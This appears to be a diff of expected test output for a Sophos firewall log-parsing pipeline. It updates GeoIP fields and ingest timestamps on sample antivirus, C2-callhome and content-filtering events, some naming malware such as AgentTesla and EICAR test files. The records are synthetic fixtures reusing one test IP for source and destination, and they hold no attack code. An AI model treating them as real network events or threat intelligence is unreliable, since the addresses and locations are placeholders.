-1138,19 +1108,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -1163,19 +1128,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57695, 
@@ -1240,7 +1200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.714861800Z", + "ingested": "2021-12-14T14:54:45.179834909Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:33 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"Sandstorm\" url=\"http://sophostest.com/Sandstorm/SBTestFile1.pdf\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", @@ -1272,19 +1232,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -1297,19 +1252,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57835, 
@@ -1374,7 +1324,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.714867800Z", + "ingested": "2021-12-14T14:54:45.179835311Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"EICAR-AV-Test\" url=\"http://sophostest.com/eicar/index.html\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", @@ -1406,19 +1356,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1434,19 +1379,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 56336, 
@@ -1512,7 +1452,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.714958Z", + "ingested": "2021-12-14T14:54:45.179835695Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"\u003c20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", @@ -1541,19 +1481,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1569,19 +1504,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 54693, 
@@ -1647,7 +1577,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715010100Z", + "ingested": "2021-12-14T14:54:45.179836065Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"\u003c20200519072944.AFCA295AF2A037A6@divella.it\u003e\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", @@ -1749,7 +1679,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715016400Z", + "ingested": "2021-12-14T14:54:45.179836457Z", "original": "device=\"SFW\" date=2018-06-06 time=10:51:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036106211001 log_type=\"Anti-Virus\" log_component=\"POPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil@postman.local\" subject=\"EICAR\" mailid=\"\u003ca5c35e4b-1198-d0eb-0763-c0d5af3c817e@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036106211001", "kind": "alert", 
@@ -1851,7 +1781,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715022700Z", + "ingested": "2021-12-14T14:54:45.179836940Z", "original": "device=\"SFW\" date=2018-06-06 time=10:58:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036206212001 log_type=\"Anti-Virus\" log_component=\"IMAPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"ganga@postman.local\" subject=\"EICAR test email\" mailid=\"\u003c2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036206212001", "kind": "alert", @@ -1945,7 +1875,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715028700Z", + "ingested": "2021-12-14T14:54:45.179837317Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:23 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031006209001 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" virus=\"EICAR-AV-Test\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Upload\" filename=\" /home/ftp-user/ta_test_file_1ta-cl1-46\" file_size=0 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"STOR\" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol=\"TCP\" src_port=39910 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=0", "code": "031006209001", "kind": "alert", 
@@ -2037,7 +1967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715034600Z", + "ingested": "2021-12-14T14:54:45.179837828Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:48 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031001609002 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" virus=\"\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Download\" filename=\"/home/ftp-user /ta_test_file_1ta-cl1-46\" file_size=19926248 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"RETR\" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol=\"TCP\" src_port=39936 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=19926248", "code": "031001609002", "kind": "event", @@ -2063,19 +1993,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, 
@@ -2141,7 +2066,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715040600Z", + "ingested": "2021-12-14T14:54:45.179838221Z", "original": "device=\"SFW\" date=2017-01-31 time=18:44:31 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=086304418010 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Drop\" priority=Warning user_name=\"jsmith\" protocol=\"TCP\" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086304418010", "kind": "alert", @@ -2169,19 +2094,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -2190,19 +2110,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57579, 
@@ -2257,7 +2172,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715046500Z", + "ingested": "2021-12-14T14:54:45.179838722Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", @@ -2285,19 +2200,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -2306,19 +2216,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57540, 
@@ -2373,7 +2278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715052600Z", + "ingested": "2021-12-14T14:54:45.179839244Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", @@ -2401,19 +2306,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, @@ -2473,7 +2373,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715058500Z", + "ingested": "2021-12-14T14:54:45.179839625Z", "original": "device=\"SFW\" date=2018-06-05 time=08:49:00 timezone=\"BST\" device_name=\"XG310\" device_id=C30006T22TGR89B log_id=086320518009 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Alert\" priority=Notice user_name=\"\" protocol=\"ICMP\" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086320518009", "kind": "alert", 
@@ -2501,19 +2401,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, @@ -2585,7 +2480,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715064900Z", + "ingested": "2021-12-14T14:54:45.179840132Z", "original": "device=\"SFW\" date=2017-01-31 time=14:03:33 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"jsmith\" user_gp=\"Open Group\" iap=1 category=\"Entertainment\" category_type=\"Unproductive\" url=\"https://r8---sn-ci5gup-qxas.googlevideo.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=10.198.47.71 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname=\"\" reason=\"\"", "code": "050901616001", "kind": "event", @@ -2611,19 +2506,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, 
@@ -2632,19 +2522,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 46719, @@ -2702,7 +2587,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715073600Z", + "ingested": "2021-12-14T14:54:45.179840564Z", "original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion \u0026 Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"", "code": "050902616002", "kind": "alert", @@ -2730,19 +2615,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 5228, 
@@ -2751,19 +2631,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 49128, @@ -2823,7 +2698,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715134Z", + "ingested": "2021-12-14T14:54:45.179840996Z", "original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"", "code": "054402617051", "kind": "alert", @@ -2851,19 +2726,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, 
@@ -2872,19 +2742,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 62851, @@ -2950,7 +2815,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715140500Z", + "ingested": "2021-12-14T14:54:45.179841374Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"400\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=80042000 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", 
@@ -2976,19 +2841,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, @@ -2997,19 +2857,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 60471, @@ -3075,7 +2930,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715146600Z", + "ingested": "2021-12-14T14:54:45.179841821Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:52 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=51 user_name=\"\" user_gp=\"\" iap=2 category=\"IPAddress\" category_type=\"Acceptable\" url=\"https://175.16.199.1/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"200\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=642960832 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050902616002", "kind": "alert", 
@@ -3103,19 +2958,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -3124,19 +2974,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 65391, 
@@ -3203,7 +3048,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715152500Z", + "ingested": "2021-12-14T14:54:45.179842336Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", 
@@ -3278,7 +3123,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:55.715158400Z", + "ingested": "2021-12-14T14:54:45.179842724Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SF01V\" device_id=1234567890123456 log_id=058420116010 log_type=\"Content Filtering\" log_component=\"Web Content Policy\" log_subtype=\"Alert\" user=\"gi123456\" src_ip=10.108.108.49 transaction_id=\"e4a127f7-a850-477c-920e-a471b38727c1\" dictionary_name=\"complicated_Custom\" site_category=Information Technology website=\"ta-web-static-testing.qa. astaro.de\" direction=\"in\" action=\"Deny\" file_name=\"cgi_echo.pl\" context_match=\"Not\" context_prefix=\"blah blah hello \" context_suffix=\" hello blah \"", "code": "058420116010", "kind": "event", @@ -3300,19 +3145,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - 